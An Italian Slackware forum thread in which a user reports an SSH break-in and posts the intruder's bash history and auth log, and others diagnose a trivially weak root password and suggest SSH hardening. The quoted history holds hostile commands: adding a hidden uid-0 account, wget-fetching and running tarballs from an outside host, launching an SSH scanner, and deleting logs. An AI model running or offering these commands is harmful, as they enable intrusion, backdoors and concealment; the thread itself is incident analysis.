Repository 32bit  Forum
Repository 64bit  Wiki

Attacchi Lamer

Postate qui per tutte le discussioni legate alla sicurezza di Linux/Slackware

Moderatore: Staff

Regole del forum
1) Citare sempre la versione di Slackware usata, la versione del Kernel e magari anche la versione della libreria coinvolta. Questi dati aiutano le persone che possono rispondere.
2) Specificare se discussione/suggerimento o richiesta d'aiuto.
3) Leggere attentamente le risposte ricevute.
4) Scrivere i messaggi con il colore di default, evitare altri colori.
5) Scrivere in Italiano o in Inglese, se possibile grammaticalmente corretto, evitate stili di scrittura poco chiari, quindi nessuna abbreviazione tipo telegramma o scrittura stile SMS o CHAT.
6) Appena registrati è consigliato presentarsi nel forum dedicato.

La non osservanza delle regole porta a provvedimenti di vari tipo da parte dello staff, in particolare la non osservanza della regola 5 porta alla cancellazione del post e alla segnalazione dell'utente. In caso di recidività l'utente rischia il ban temporaneo.

Attacchi Lamer

Messaggioda Sari » mer feb 16, 2005 21:37

Salve a tutti e´ la prima volta che posto in questo Forum e lo faccio per necessita visto che appena mi muniro´ di un router passero´ a Linux Slackware. <BR>Metto su questo forum la discussione per un semplice motivo : <BR>Ieri alle 21:25 sono stato vittima di un attacco Lamer in piena regola, dai log risulta qualche frangente di questo attacco, non so pero´ per cosa abbiano usato il mio computer e la mia connessione :(, fortunatamente non avevo dati importanti che potessero essere trafugati. <BR>Sono stato attaccato mentre sul mio sistema era in funzione una distro Mandrake, la mandrake 10.1, e per questo motivo la abbandono e passo a slackware consigliata vivamente da un amico. <BR>D´ora in poi della sicurezza faro´ il mio punto forte. <BR>Spero in questo forum di trovare aiuto visto che so della maggiore difficolta´ di utilizzo di slackware, ma cio´ non mi spaventa, l´amico google e forum come questi credo siano sufficenti per avere l´aiuto di cui ho bisogno. <BR>Sto gia leggendo con gusto l´utile slackware for dummies e sto trovando molte risposte, spero tutte quelle di cui ho bisogno. <BR>Ho gia trovato la risposta al problema ATI :) <BR>Con questo mio primo post colgo l´occasione per salutare tutti e per dire w Slackware e dio me la mandi buona :) (che gia ho usato per un piccolo serverino a casa di un amico). <BR> <BR>P.S.: aspettatevi entro qualche giorno domande a raffica ( non preoccupatevi prima faro´ di tutto per risolvere da me almeno imparo poi passero´ di qui :) ).
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Attacchi Lamer

Messaggioda Loris » mer feb 16, 2005 22:09

Sari benvenuto nel mondo Slackware :) <BR> <BR>p.s. <BR>Sarebbe bello capire come hanno fatto questi Lamer a entrare nel tuo sistema, i log che dicono ?
"Ho una testa piuttosto balzana e comunque non sono quello che credete" - Roger Keith Barrett
Avatar utente
Loris
Admin
Admin
 
Messaggi: 7578
Iscritto il: dom mar 30, 2003 23:00
Località: Gradisca D'Isonzo
Nome Cognome: Loris Vincenzi
Slackware: 14.1
Kernel: 3.10.17
Desktop: Kde 4.10.5

Attacchi Lamer

Messaggioda Sari » mer feb 16, 2005 22:17

posto di seguito alcuni logggoni :) non so se sono utili a sapere qualcosa ma sono gli unici rimasti ... <BR> <BR>primo rimasto e´ il log della bash di Root <BR> <BR>w <BR>dir -a <BR>rm -rf .bash_history .bash_logout .fullcircle .ICEauthority .rfbdrake .vimrc <BR>ls <BR>dir -a <BR>rm -rf .bash_profile .bashrc <BR>/usr/sbin/adduser admin -g0 -o -u0 <BR>passwd admin <BR>cat /etc/issue <BR>/sbin/ifconfig <BR>cd /var/tmp <BR>wget bone.go.ro/mirkforce.tgz <BR>tar -xzvf mirkforce.tgz <BR>rm -rf mirkforce.tgz <BR>cd ./ecmf/ <BR>./mirkforce <BR>cd .. <BR>ls <BR>rm -rf ./ecmf/ <BR>cd /var/spool/samba/ <BR>ls <BR>wget bone.go.ro/hait.tgz <BR>tar -xzvf hait.tgz <BR>rm -rf hait.tgz <BR>cd ssh/ <BR>./go.sh 210.21 <BR>cd .. <BR>ls <BR>rm -rf ssh/ <BR>wget bone.go.ro/bone.tgz <BR>tar -xzvf bone.tgz <BR>rm -rf bone.tgz <BR>cd " " <BR>ls <BR>mv lroot init <BR>export PATH=.:$PATH <BR>init <BR>cd " " <BR>ls <BR>wget bone.go.ro/treeball.tgz <BR>tar -xzvf treeball.tgz <BR>dir -a <BR>rm -rf treeball.tgz <BR>ls <BR> <BR>Come si note han creato l´utente Admin, quello che mi insospettito all´avvio di mandrakkia, e poi il resto e´ storia :(. <BR> <BR>e questo i log Auth in var/log <BR> <BR>Feb 15 21:20:00 francesco sshd[21706]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:21:18 francesco sshd[21763]: Invalid user test from 217.29.80.92 <BR>Feb 15 21:21:18 francesco sshd[21763]: error: Could not get shadow information for NOUSER <BR>Feb 15 21:21:18 francesco sshd[21763]: Failed password for invalid user test from 217.29.80.92 port 13155 ssh2 <BR>Feb 15 21:21:20 francesco sshd[21765]: Invalid user guest from 217.29.80.92 <BR>Feb 15 21:21:20 francesco sshd[21765]: error: Could not get shadow information for NOUSER <BR>Feb 15 21:21:20 francesco sshd[21765]: Failed password for invalid user guest from 217.29.80.92 port 13239 ssh2 <BR>Feb 15 21:21:22 francesco sshd[21770]: Invalid user admin from 217.29.80.92 <BR>Feb 15 21:21:22 francesco sshd[21770]: error: Could not get shadow information for NOUSER <BR>Feb 15 21:21:22 francesco sshd[21770]: Failed password for invalid user admin from 217.29.80.92 port 13315 ssh2 <BR>Feb 15 21:21:25 francesco sshd[21772]: Invalid user admin from 217.29.80.92 <BR>Feb 15 21:21:25 francesco sshd[21772]: error: Could not get shadow information for NOUSER <BR>Feb 15 21:21:25 francesco sshd[21772]: Failed password for invalid user admin from 217.29.80.92 port 13439 ssh2 <BR>Feb 15 21:21:27 francesco sshd[21777]: Invalid user user from 217.29.80.92 <BR>Feb 15 21:21:27 francesco sshd[21777]: error: Could not get shadow information for NOUSER <BR>Feb 15 21:21:27 francesco sshd[21777]: Failed password for invalid user user from 217.29.80.92 port 13538 ssh2 <BR>Feb 15 21:21:29 francesco sshd[21779]: Failed password for root from 217.29.80.92 port 13627 ssh2 <BR>Feb 15 21:21:31 francesco sshd[21784]: Accepted password for root from 217.29.80.92 port 13700 ssh2 <BR>Feb 15 21:22:06 francesco sshd[21845]: Accepted password for root from 81.181.153.217 port 1251 ssh2 <BR>Feb 15 21:22:57 francesco adduser[21925]: new user: name=admin, uid=0, gid=0, home=/home/admin, shell=/bin/bash <BR>Feb 15 21:23:04 francesco passwd(pam_unix)[21929]: password changed for admin <BR>Feb 15 21:25:00 francesco sshd[22060]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:30:00 francesco sshd[22316]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:33:53 francesco xinetd[5064]: START: sgi_fam pid=22502 from=<no address> <BR>Feb 15 21:35:01 francesco sshd[22580]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:40:00 francesco sshd[22840]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:45:01 francesco sshd[23085]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:50:00 francesco sshd[23313]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 21:55:00 francesco sshd[23526]: Did not receive identification string from 127.0.0.1 <BR>Feb 15 22:00:00 francesco sshd[23740]: Did not receive identification string from 127.0.0.1 <BR> <BR>si nota solo l´ora di inizio e poco altro apparte il loro ip :) ma ovviamente saran passati da proxy o avran cmqe usato qualcosa per renderlo inutile ... <BR>Ovviamente prima dei suddetti log avran fatto qualcosa per avere i privilegi di root o roba simile, non sono un esperto pultroppo. <BR> <BR>
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Attacchi Lamer

Messaggioda Sari » mer feb 16, 2005 22:28

A gia mi son dimenticato di dire anche che il computer era inagibile questa mattina quando sono andato a vedere come stava (e´ accesso molte ore al giorno anche di notte), errori sopra errori (oserei dire orrori), e ovvio ora lo raso a zero per cancellare ogni possibile problema.
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Attacchi Lamer

Messaggioda Michele84 » gio feb 17, 2005 13:46

Gia gia... ti hanno proprio "bucato" !!! <BR>Dovresti capire però come sono riusciti ad entrare e ad avere accesso a previlegi di root. <BR>Pure il mio pc è sempre acceso e quasi sempre trovo log di ip che provano ad entrare. <BR>In ogni caso riesco a vedere quello che fanno grazie al log di syslog e message. <BR>Molte delle volte questi cracker riescono ad entrare tramite una falla del sito web o qualcosa di simile. <BR>Ciauz! <BR>
Michele84
Linux 2.4
Linux 2.4
 
Messaggi: 267
Iscritto il: mer dic 17, 2003 0:00

Attacchi Lamer

Messaggioda Sari » ven feb 18, 2005 9:59

I log di Syslog sono andati a farsi benedire ghgh, hanno bruciato praticamente tutto, mi sono trovato il pc che non si avviava se non in modalita´ testuale (e per mandrake e´ moolto strano), con la maggior parte dei comandi stile cp che davano segmentation fault. Per fortuna le partizioni non sono state corrotte o rovinate cosi´ son riuscito a montarle. <BR>Sicuramente han fatto casini grossi per togliere ogni traccia importante. <BR>Sono felice di aver avuto windows (per la prima volta :) ) in una parte dell´hard-disk cosi´ ho potuto con qualche peripezia scartabellare le ext3 e salvare i dati importanti sulla partizione ntfs. <BR>E per fortuna che tengo i backup dei dati su NTFS cosi´ son sicuro che non hanno scritto o fatto nulla almeno li dentro (almeno cosi´ credo). <BR>Anzi domandona (se sparo una cavolata non uccidetemi ghgh): Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare? <BR> <BR>P.S.: Oggi pomeriggio assieme ad un amico compro il router ed installo slackware se tutto va bene stasera dovrei scrivere il mio primo messaggio con slacky :)
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Attacchi Lamer

Messaggioda useless » ven feb 18, 2005 10:26

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-1>Quote:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><BLOCKQUOTE> <BR> 18-02-2005 alle ore 09:59, Sari : <BR>Secondo il vostro parere e´ possibile che accendendo da ssh ad un computer linux con partizioni ntfs montate con accesso solo in lettura per ovvi motivi (parlo di mandrake), possano riuscire in qualche modo a scrivere su quest´ultime? che ne so qualche programma o utility particolare da sfruttare? <BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End --> <BR> <BR>se diventano root possono tranquillamente usare dd o qualsiasi tool che accede al disco come dispositivo a blocchi.
Avatar utente
useless
Staff
Staff
 
Messaggi: 3896
Iscritto il: sab ott 11, 2003 23:00
Località: A place where the streets have no name

Attacchi Lamer

Messaggioda People » ven feb 18, 2005 11:18

Si... sono d´accordo con lorys... sarebbe interessante capire.... <BR> <BR>Ma il pc era su internet... come server web? Avevi altri servizi attivi? Possono aver avuto accesso alla macchina... fisicamente? <BR> <BR>Non per farmi gli affari tuoi.... ;-) ma perchè, secondo me, la tua esperienza può essere utile anche ad altri! <BR>Ciao <BR>P.
Avatar utente
People
Linux 2.4
Linux 2.4
 
Messaggi: 216
Iscritto il: lun giu 21, 2004 23:00
Slackware: 12.1
Kernel: 2.6.
Desktop: KDE

Attacchi Lamer

Messaggioda manny » ven feb 18, 2005 11:24

Bella storia, <BR>la tua password doveva essere veramente semplice se hanno impiegato così poco tempo per farti fuori; non credo che abbiano fatto saltare ssh, l´ultima versione è al sicuro da exploit...il tutto per dirti che anche montando una slackware NON sei al sicuro se non disabiliti servizi che non ti servono (vedi telnet, finger, ssh) e se non crei qualche restrizione di accesso, e utilizzando password - non solo lunghe - ma complicate. Per ssh per esempio puoi impostare nel sshd_config un solo utente che puo collegarsi e INIBIRE l´accesso come root: diventerai successivamente root col comando su. In questo modo crei una doppia complicazione per l´attaccante: non conosce già un utente (cioè root) dovendo poi solo indovinare la passwd ma dovrà conoscere l´utente abilitato a collegarsi via ssh + la sua passwd. <BR>Dai un´occhiata veloce a <a href="http://www.valtellinux.it/blindolinux/blindolinux.htm" target="_blank" target="_new">http://www.valtellinux.it/blindolinux/blindolinux.htm</a> <BR>Ciao! <BR>Manny
Avatar utente
manny
Linux 2.4
Linux 2.4
 
Messaggi: 277
Iscritto il: mer ott 29, 2003 0:00
Slackware: 13.1 (fisso)
Kernel: 2.6.33.4
Desktop: kde
Distribuzione: Debian 5 (notebook)

Attacchi Lamer

Messaggioda People » ven feb 18, 2005 12:33

Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root?? <BR> <BR>P. <BR>
Avatar utente
People
Linux 2.4
Linux 2.4
 
Messaggi: 216
Iscritto il: lun giu 21, 2004 23:00
Slackware: 12.1
Kernel: 2.6.
Desktop: KDE

Attacchi Lamer

Messaggioda manny » ven feb 18, 2005 12:41

<!-- BBCode Quote Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85%><TR><TD><font size=-1>Quote:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><BLOCKQUOTE> <BR> 18-02-2005 alle ore 12:33, People : <BR>Perdonate.... io sono abbastanza ignorante in materia... se non ho interpretato male il log... hanno "indovonato" la password di root?? <BR> <BR>P. <BR></BLOCKQUOTE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode Quote End --> <BR> <BR>Anch´io non ne so molto, ma da quello che vedo la macchina si chiamava francesco e l´attaccante stava provando diversi utenti e password per loggarsi. Ad un certo punto ha centrato quella di root, probabilmente perchè root oltretutto non era inibito all´accesso dal config di ssh...come l´abbia trovata non lo so, per fortuna o da qualche altra parte, ma da quello che vedo dai log così mi sembra. <BR>Ciao, <BR>Manny
Avatar utente
manny
Linux 2.4
Linux 2.4
 
Messaggi: 277
Iscritto il: mer ott 29, 2003 0:00
Slackware: 13.1 (fisso)
Kernel: 2.6.33.4
Desktop: kde
Distribuzione: Debian 5 (notebook)

Attacchi Lamer

Messaggioda useless » ven feb 18, 2005 12:55

ti va di dirci qual era la tua password di root? così, per curiosità!
Avatar utente
useless
Staff
Staff
 
Messaggi: 3896
Iscritto il: sab ott 11, 2003 23:00
Località: A place where the streets have no name

Attacchi Lamer

Messaggioda touchstyle » ven feb 18, 2005 14:20

Questa sporca faccenda mi ha fatto riflettere... <BR>Gli utenti che utilizzano Linux secondo me si dividono in 3: <BR>- quelli che non sanno niente ---> Mandrake <BR>- quelli che vogliono imparare ---> Slack <BR>- quelli che gia sanno ---> Slack ricompilata ad hoc. <BR>Con questo voglio dire che l´utente che si avvicina al pinguino con le ultime distro (Mandrake dalla 9 in poi, Suse >8.2, Fedora ecc...) pensano di trovarsi su un sistema sicuro e al riparo da intrusioni. <BR>Questo purtroppo non è vero. <BR>Linux, se non configurato a dovere (lo so, ci vuole poco), avvia servizi che qualcuno può sfruttare volontariamente in maniera non legittima. <BR>La fortuna é che per poter accedere ad un sistema basato su linux serve SAPERE, e chi è in possesso di queste informazioni normalmente NON le usa per scopi lamerosi o crakkosi, in quanto la nobiltà d´animo è proporzionale alla conoscienza, a mio avviso. <BR>Naturalmente le mele marce esistono, e si sa che il "male" fa rumore, mentre il "bene" è un vento silenzioso. <BR> <BR>Tutta ´sta menata per dire cosa? <BR>Beh, per proporre che nel nuovo Slack4Dumm, ci sia una sezione dedicata alla sicurezza "domestica" con: <BR>- come proteggere la macchina che si usa per navigare/posta/lopster; <BR>- come controllare i files di log (argomento VIP!); <BR>- come testare se la macchina è sicura e da cosa. <BR> <BR>Bon, basta. Son stuf,go scrito massa! :-o <BR>Ou fioi, forse cambio piccì! :-] Togo un P3-700 da Simpaticotech, a 190 euri? Fasso ben? <BR> <BR>Se fossi gatto, miao. <BR>Se fossi cane, bao. <BR>Se fosse tardi... ciao. <BR> <BR>Touch <BR>
Avatar utente
touchstyle
Linux 3.x
Linux 3.x
 
Messaggi: 1085
Iscritto il: mer mag 12, 2004 23:00
Località: Portogruaro [VE]
Slackware: 12.1
Kernel: 2.6.27
Desktop: KDE

Attacchi Lamer

Messaggioda Sari » ven feb 18, 2005 20:29

Ok so che mi prendero´ del deficente ghgh. <BR>Ora vi svelero´ la mia password di root, quella vecchia ovviamente ora l´ho cambiata, dagli errori si impara ... <BR> <BR>Pronti? Vi siete seduti comodamente con i popcorn e una birra fresca? Pronti a sentire la frase che vi fara´ ridere per mille anni dell´idiozia di un uomo? .... <BR> <BR>La mia password di root era ... ROOT ......... <BR> <BR> <BR> <BR> <BR>Ok ora potete uccidermi .......
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Attacchi Lamer

Messaggioda Sari » ven feb 18, 2005 20:29

a gia dimenticavo ... Ho vinto qualche cossa?!?!? ... dai perlomeno sono entrato nell´albo d´oro delle cavolate o no?
Avatar utente
Sari
Linux 2.6
Linux 2.6
 
Messaggi: 584
Iscritto il: mer feb 16, 2005 0:00
Località: Verona
Slackware: 12.1
Kernel: 2.6.24
Desktop: Gnome

Prossimo

Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 0 ospiti